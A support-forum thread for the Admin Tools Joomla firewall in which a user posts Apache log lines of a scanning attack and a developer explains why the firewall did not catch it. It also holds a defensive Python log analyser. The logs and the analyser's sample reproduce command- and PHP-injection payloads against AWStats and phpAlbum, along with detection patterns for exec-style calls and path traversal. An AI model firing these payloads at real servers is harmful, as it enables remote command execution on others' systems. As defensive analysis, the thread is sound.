#10160 missed attack attempt

Posted in ‘Admin Tools for Joomla! 4 & 5’
Environment Information

Joomla! version
n/a
PHP version
n/a
Admin Tools version
n/a

Latest post by nicholas on Saturday, 17 December 2011 17:26 CST

user53260
I've checked my Apache logs and found suspicious activity, which is most probably a hack attempt. This one was not triggered by the firewall.

The previous 2 attempts (from other IPs, but with the same pattern/tries) were caught by the firewall, but only 1 time (MUA Shield, URL looks like "?file=../../../../../../proc/self/environ").

The 3rd attempt below didn't have that attack (MUA Shield) and was not logged by the firewall. I found it because the Joomla redirect component recorded 404 errors.

82.228.250.163 - - [17/Dec/2011:18:58:18 +0200] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0" 404 297 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
82.228.250.163 - - [17/Dec/2011:18:58:19 +0200] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;;echo%20YYY;echo| HTTP/1.0" 404 297 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
82.228.250.163 - - [17/Dec/2011:18:58:19 +0200] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0" 404 305 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
82.228.250.163 - - [17/Dec/2011:18:58:21 +0200] "GET /cgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
82.228.250.163 - - [17/Dec/2011:18:58:27 +0200] "GET /cgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0" 404 301 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
82.228.250.163 - - [17/Dec/2011:18:58:28 +0200] "GET /scgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0" 404 298 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
82.228.250.163 - - [17/Dec/2011:18:58:28 +0200] "GET /scgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
82.228.250.163 - - [17/Dec/2011:18:58:29 +0200] "GET /scgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
82.228.250.163 - - [17/Dec/2011:18:58:29 +0200] "GET /scgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
82.228.250.163 - - [17/Dec/2011:18:58:36 +0200] "GET /scripts/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0" 404 297 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
82.228.250.163 - - [17/Dec/2011:18:58:36 +0200] "GET /stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0" 404 295 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
82.228.250.163 - - [17/Dec/2011:18:58:37 +0200] "GET /apps/phpAlbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.0" 404 4654 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
82.228.250.163 - - [17/Dec/2011:18:58:51 +0200] "GET /phpAlbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.0" 404 4654 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
82.228.250.163 - - [17/Dec/2011:18:58:54 +0200] "GET /main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.0" 404 4648 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
82.228.250.163 - - [17/Dec/2011:18:58:56 +0200] "GET /phpalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.0" 404 4654 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
82.228.250.163 - - [17/Dec/2011:18:58:58 +0200] "GET /apps/phpalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.0" 404 4654 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
82.228.250.163 - - [17/Dec/2011:18:59:04 +0200] "GET /awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.0" 404 4648 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
82.228.250.163 - - [17/Dec/2011:18:59:26 +0200] "GET /awstats/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.0" 404 4654 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"

nicholas
Akeeba Staff
Manager
Web Application Firewall is part of Admin Tools Professional which is a Joomla! component and plugin combination. As such, it only runs when a Joomla! URL is being loaded by the web server. Look at the URLs you posted. They are accessing AWStats, a Perl script running on your server. Your question is like asking "Why doesn't my antivirus, running on my Windows machine, detect a virus in the email I opened from my Linux machine, if they are both in the same room?". You see my point, right? :)

Nicholas K. Dionysopoulos

Lead Developer and Director

🇬🇷 Greek: native 🇬🇧 English: excellent 🇫🇷 French: basic • 🕐 My time zone is Europe / Athens
Please keep in mind my timezone and cultural differences when reading my replies. Thank you!
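A defender-side check of the kind this thread invites, added here as an example and not code from the ticket or from Admin Tools: it parses Apache combined log lines (constructed from the posted excerpt), URL-decodes each request, flags the injection markers seen in the posted URLs, and notes whether the request would even reach Joomla's index.php, which is where the Admin Tools WAF runs. The SEF rewrite assumption and the entry-point list are hypothetical.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample, modelled on the ticket's excerpt (user agents shortened).
SAMPLE_LOG = """\
82.228.250.163 - - [17/Dec/2011:18:58:18 +0200] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0" 404 297 "-" "Mozilla/5.0"
82.228.250.163 - - [17/Dec/2011:18:58:37 +0200] "GET /apps/phpAlbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.0" 404 4654 "-" "Mozilla/5.0"
82.228.250.163 - - [17/Dec/2011:18:59:04 +0200] "GET /awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d HTTP/1.0" 404 4648 "-" "Mozilla/5.0"
10.0.0.5 - - [17/Dec/2011:19:00:00 +0200] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 12345 "-" "Mozilla/5.0"
"""

# Apache "combined" log line, the format of the lines posted in the ticket.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Indicators matched against the URL-decoded request target; they cover the
# patterns in the posted lines (CGI pipe, PHP exec-style call, traversal).
INDICATORS = {
    "cgi-pipe": re.compile(r'=\|'),
    "php-exec-call": re.compile(r'\b(?:passthru|system|exec|shell_exec)\s*\(', re.I),
    "traversal": re.compile(r'(?:\.\./)+|/proc/self/environ'),
}

# Assumption (hypothetical, typical SEF setup): only Joomla's front controllers,
# plus extensionless paths that mod_rewrite sends to index.php, run the WAF.
JOOMLA_ENTRYPOINTS = {"/index.php", "/administrator/index.php"}

def reaches_joomla(path):
    """True if the request is dispatched to Joomla, and so to Admin Tools' WAF."""
    if path in JOOMLA_ENTRYPOINTS:
        return True
    return "." not in path.rsplit("/", 1)[-1]  # e.g. awstats.pl is served by Apache

def analyze(log_text):
    """Parse each line and report injection indicators and WAF coverage."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        target = m.group("target")
        path = urlsplit(target).path
        decoded = unquote(target)  # inspect the decoded form, as a WAF would
        hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
        findings.append({"ip": m.group("ip"), "path": path, "indicators": hits,
                         "status": int(m.group("status")),
                         "waf_in_path": reaches_joomla(path)})
    return findings
```

Requests that carry an indicator but have `waf_in_path` false are exactly the class the thread describes: they never pass through Joomla, so a Joomla-level firewall cannot see them and web-server-level controls or removal of the target script are the mitigation.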

user53260
Sure, I see your point.
Still, the Joomla core Redirect manager recorded some of the attempts (not to awstats, but to the "album") with 404 errors.
In any case, it was just FYI :)

nicholas
Akeeba Staff
Manager
This attack would only work if the software on your site is using eval with unfiltered input. Catching those attacks with a firewall would throw so many false positives it would be impossible to use your site. Besides, any software doing what I just described is such a huge pile of crap that it can't be protected effectively by anything except an immediate uninstallation of it. There's only so much you can do to protect a site with a firewall.
